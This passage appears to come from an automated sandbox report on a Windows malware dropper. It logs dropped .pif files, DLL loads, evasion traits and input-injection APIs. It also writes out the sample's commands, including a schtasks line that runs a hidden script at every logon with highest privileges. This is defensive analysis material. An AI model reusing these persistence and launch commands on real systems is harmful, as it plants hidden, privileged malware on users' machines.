            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000014.00000000.3250004113.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.11.dr
            Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000014.00000000.3250004113.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.11.dr
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009F8B75 push ecx; ret 11_2_009F8B88
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001A8B75 push ecx; ret 16_2_001A8B88

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\723582\Flash.pifJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifFile created: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\723582\Flash.pifJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifFile created: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifFile created: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "ApolloSphere" /tr "wscript //B 'C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js'" /sc onlogon /F /RL HIGHEST
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A559B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00A559B3
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009E5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_009E5EDA
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_002059B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_002059B3
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_00195EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_00195EDA
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009F33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_009F33B7
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeStalling execution: Execution stalls by calling Sleepgraph_0-3897
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifAPI coverage: 4.9 %
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifAPI coverage: 4.7 %
            Source: C:\Windows\SysWOW64\timeout.exe TID: 5672Thread sleep count: 115 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00A34005
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00A3494A
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00A33CE2
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00A3C2FF
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00A3CD9F
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3CD14 FindFirstFileW,FindClose,11_2_00A3CD14
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00A3F5D8
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00A3F735
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00A3FA36
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001E4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_001E4005
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001E494A GetFileAttributesW,FindFirstFileW,FindClose,16_2_001E494A
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001EC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_001EC2FF
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001ECD14 FindFirstFileW,FindClose,16_2_001ECD14
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001ECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,16_2_001ECD9F
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001EF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_001EF5D8
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001EF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_001EF735
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001EFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_001EFA36
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001E3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_001E3CE2
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009E5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_009E5D13
            Source: ApolloSphere.pif, 00000010.00000002.3255848857.0000000003A92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM\
            Source: Flash.pif, 0000000B.00000002.3255647611.0000000001325000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A445D5 BlockInput,11_2_00A445D5
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009E5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_009E5240
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A05CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00A05CAC
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00A288CD
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009FA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_009FA385
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009FA354 SetUnhandledExceptionFilter,11_2_009FA354
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001AA354 SetUnhandledExceptionFilter,16_2_001AA354
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001AA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_001AA385
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A29369 LogonUserW,11_2_00A29369
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009E5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_009E5240
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A31AC6 SendInput,keybd_event,11_2_00A31AC6
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A351E2 mouse_event,11_2_00A351E2
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Surgeons Surgeons.cmd & Surgeons.cmd & exitJump to behavior
